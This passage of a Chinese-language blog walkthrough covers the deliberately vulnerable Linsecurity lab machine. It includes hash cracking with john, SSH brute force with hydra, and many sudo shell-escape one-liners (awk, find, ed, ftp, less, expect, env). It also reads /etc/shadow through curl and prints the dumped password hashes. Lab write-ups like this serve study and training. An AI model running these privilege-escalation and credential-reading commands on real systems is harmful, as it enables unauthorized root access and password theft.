lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151401.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224215859358\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6216\u8005 kali \u4e00\u7ad9\u5230\u5e95\uff1a<\/p>\n<pre><code class=\"language-bash\">echo AzER3pBZh6WZE &gt; hash | john hash --wordlist = \/usr\/share\/wordlists\/rockyou.txt <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151402.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151402.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225001309318\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f97\u5230\u5bc6\u7801\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-apl\">insecurity\nP@ssw0rd!<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151403.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151403.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224220427298\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u7206\u7834\u51fa bob \u7528\u6237\u518d\u63d0\u6743(peter)<\/h3>\n<pre><code class=\"language-bash\">cat \/etc\/passwd\n# \u627e\u5230\u4e00\u4e9b\u7528\u6237\u540d\u4e22\u8fdb\u53bb\u7206\u7834\uff0c\u8fd9\u91cc\u76f4\u63a5\u653e\u5165bob\u548csusan\necho -e &quot;bob\\nsusan&quot; &gt; flag.txt\nhydra -L flag.txt -P \/usr\/share\/seclists\/Passwords\/500-worst-passwords.txt 192.168.244.129 ssh -t 4<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151404.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151404.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225002852941\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>ssh\u8fde\u63a5\u4e00\u4e0b\uff0c\u4f7f\u7528\u6700\u7b80\u5355\u7684\u63d0\u6743\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151405.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151405.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225002646382\" \/><\/div><\/p>\n<h3>strace(peter) (NFS privilege escalation)<\/h3>\n<p>\u5148\u67e5\u770b\u4e00\u4e0b<code>sudo -l<\/code>\uff1a<\/p>\n<p>\u68c0\u7d22\u4e00\u4e0b\u76f8\u5173\u63d0\u6743\u65b9\u6cd5\uff1a<code>sudo strace -o \/dev\/null \/bin\/sh<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151406.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151406.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225003045749\" \/><\/div><\/p>\n<h3>sudo -l<\/h3>\n<p>\u5148\u4f7f\u7528<code>sudo -l<\/code>\u67e5\u770b\u4e00\u4e0b\u57fa\u7840\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">Matching Defaults entries for bob on linsecurity:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser bob may run the following commands on linsecurity:\n    (ALL) \/bin\/ash, \/usr\/bin\/awk, \/bin\/bash, \/bin\/sh, \/bin\/csh, \/usr\/bin\/curl, \/bin\/dash, \/bin\/ed, \/usr\/bin\/env, \/usr\/bin\/expect, \/usr\/bin\/find, \/usr\/bin\/ftp, \/usr\/bin\/less, \/usr\/bin\/man,\n        \/bin\/more, \/usr\/bin\/scp, \/usr\/bin\/socat, \/usr\/bin\/ssh, \/usr\/bin\/vi, \/usr\/bin\/zsh, \/usr\/bin\/pico, \/usr\/bin\/rvim, \/usr\/bin\/perl, \/usr\/bin\/tclsh, \/usr\/bin\/git, \/usr\/bin\/script, \/usr\/bin\/scp<\/code><\/pre>\n<h3>ash(bob)<\/h3>\n<pre><code class=\"language-shell\">sudo ash<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151407.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151407.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224220834963\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>awk(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo awk &#039;BEGIN {system(&quot;\/bin\/sh&quot;)}&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151408.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151408.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224221053987\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>bash(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo bash<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151409.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151409.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224221221469\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h3>csh(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo csh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151410.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151410.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224223927353\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>curl(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo curl file:\/\/\/etc\/shadow<\/code><\/pre>\n<pre><code class=\"language-text\">root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2\/6K\/UU5wLobTSz\/Pw5\/ILvXgq9NibQ0\/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::\ndaemon:*:17647:0:99999:7:::\nbin:*:17647:0:99999:7:::\nsys:*:17647:0:99999:7:::\nsync:*:17647:0:99999:7:::\ngames:*:17647:0:99999:7:::\nman:*:17647:0:99999:7:::\nlp:*:17647:0:99999:7:::\nmail:*:17647:0:99999:7:::\nnews:*:17647:0:99999:7:::\nuucp:*:17647:0:99999:7:::\nproxy:*:17647:0:99999:7:::\nwww-data:*:17647:0:99999:7:::\nbackup:*:17647:0:99999:7:::\nlist:*:17647:0:99999:7:::\nirc:*:17647:0:99999:7:::\ngnats:*:17647:0:99999:7:::\nnobody:*:17647:0:99999:7:::\nsystemd-network:*:17647:0:99999:7:::\nsystemd-resolve:*:17647:0:99999:7:::\nsyslog:*:17647:0:99999:7:::\nmessagebus:*:17647:0:99999:7:::\n_apt:*:17647:0:99999:7:::\nlxd:*:17647:0:99999:7:::\nuuidd:*:17647:0:99999:7:::\ndnsmasq:*:17647:0:99999:7:::\nlandscape:*:17647:0:99999:7:::\npollinate:*:17647:0:99999:7:::\nsshd:*:17647:0:99999:7:::\nbob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::\nstatd:*:17721:0:99999:7:::\npeter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A\/x7GhQQvJ0RoYwG4Jxj\/6R58SJddU2X\/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::\nsusan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN\/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9\/SR\/:17721:0:99999:7:::<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b<code>root<\/code>\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-text\">root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2\/6K\/UU5wLobTSz\/Pw5\/ILvXgq9NibQ0\/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::<\/code><\/pre>\n<p><strong>\u7528\u6237\u540d<\/strong>\uff1a\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\u662f &quot;root&quot;\uff0c\u8868\u793a\u8fd9\u662f root \u7528\u6237\u7684\u6761\u76ee\u3002<\/p>\n<p><strong>\u5bc6\u7801\u54c8\u5e0c<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u4fdd\u5b58\u4e86\u7528\u6237\u7684\u5bc6\u7801\u54c8\u5e0c\u503c\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5bc6\u7801\u54c8\u5e0c\u662f <code>$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2\/6K\/UU5wLobTSz\/Pw5\/ILvXgq9NibQ0\/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1<\/code>\uff0c\u5b83\u662f\u7ecf\u8fc7\u52a0\u5bc6\u5904\u7406\u7684\u5bc6\u7801\u3002<\/p>\n<p><strong>\u4e0a\u6b21\u4fee\u6539\u65e5\u671f<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u81ea1970\u5e741\u67081\u65e5\u8d77\uff0c\u8ddd\u79bb\u4e0a\u6b21\u4fee\u6539\u5bc6\u7801\u7684\u5929\u6570\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f &quot;17721&quot; \u5929\u3002<\/p>\n<p><strong>\u5bc6\u7801\u5230\u671f\u524d\u8b66\u544a\u5929\u6570<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u5bc6\u7801\u8fc7\u671f\u524d\u7684\u8b66\u544a\u5929\u6570\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f &quot;0&quot; \u5929\u3002<\/p>\n<p><strong>\u5bc6\u7801\u8fc7\u671f\u5929\u6570<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u5bc6\u7801\u7684\u6700\u5927\u6709\u6548\u671f\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f &quot;99999&quot; \u5929\uff0c\u8868\u793a\u5bc6\u7801\u6c38\u4e0d\u8fc7\u671f\u3002<\/p>\n<p><strong>\u5bc6\u7801\u8fc7\u671f\u65e5\u671f<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u81ea1970\u5e741\u67081\u65e5\u8d77\uff0c\u5bc6\u7801\u8fc7\u671f\u7684\u7edd\u5bf9\u65e5\u671f\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f &quot;7&quot; \u5929\uff0c\u8868\u793a\u5bc6\u7801\u6c38\u4e0d\u8fc7\u671f\u3002<\/p>\n<p><strong>\u8d26\u6237\u5931\u6548\u65e5\u671f<\/strong>\uff1a\u8fd9\u4e2a\u5b57\u6bb5\u8868\u793a\u81ea1970\u5e741\u67081\u65e5\u8d77\uff0c\u8d26\u6237\u5931\u6548\u7684\u7edd\u5bf9\u65e5\u671f\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u662f\u7a7a\u7684\uff0c\u8868\u793a\u8d26\u6237\u6c38\u4e0d\u5931\u6548\u3002<\/p>\n<p><strong>\u4fdd\u7559\u5b57\u6bb5<\/strong>\uff1a\u8fd9\u4e9b\u5b57\u6bb5\u76ee\u524d\u6ca1\u6709\u88ab\u4f7f\u7528\u3002<\/p>\n<h3>dash(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo dash<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151411.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151411.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224224654508\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>ed(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo ed\n!\/bin\/sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151412.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151412.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224224843707\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>env(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo env \/bin\/sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151413.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151413.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224225009591\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>expect(bob)<\/h3>\n<blockquote>\n<p>expect\u662f\u4e00\u4e2a\u81ea\u52a8\u5316\u4ea4\u4e92\u5957\u4ef6\uff0c\u4e3b\u8981\u5e94\u7528\u4e8e\u6267\u884c\u547d\u4ee4\u548c\u7a0b\u5e8f\u65f6\uff0c\u7cfb\u7edf\u4ee5\u4ea4\u4e92\u5f62\u5f0f\u8981\u6c42\u8f93\u5165\u6307\u5b9a\u5b57\u7b26\u4e32\uff0c\u5b9e\u73b0\u4ea4\u4e92\u901a\u4fe1\u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">sudo expect -c &#039;spawn \/bin\/sh;interact&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151414.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151414.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224225351372\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>find(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo find . -exec \/bin\/sh \\; -quit\n# -quit\u524d\u9762\u7684\u7a7a\u683c\uff01\uff01\uff01<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151415.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151415.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224225532579\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>ftp(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo ftp\n!\/bin\/sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151416.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151416.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224225833328\" style=\"zoom:67%;\" \/><\/div><\/p>\n<h3>Less(bob)<\/h3>\n<blockquote>\n<p>less \u4e0e more \u7c7b\u4f3c\uff0c\u4f46\u4f7f\u7528 less \u53ef\u4ee5\u968f\u610f\u6d4f\u89c8\u6587\u4ef6\uff0c\u800c more \u4ec5\u80fd\u5411\u524d\u79fb\u52a8\uff0c\u5374\u4e0d\u80fd\u5411\u540e\u79fb\u52a8\uff0c\u800c\u4e14 less \u5728\u67e5\u770b\u4e4b\u524d\u4e0d\u4f1a\u52a0\u8f7d\u6574\u4e2a\u6587\u4ef6\u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">sudo less \/etc\/passwd\n!\/bin\/sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151417.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151417.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224230427559\" style=\"zoom:50%;\" 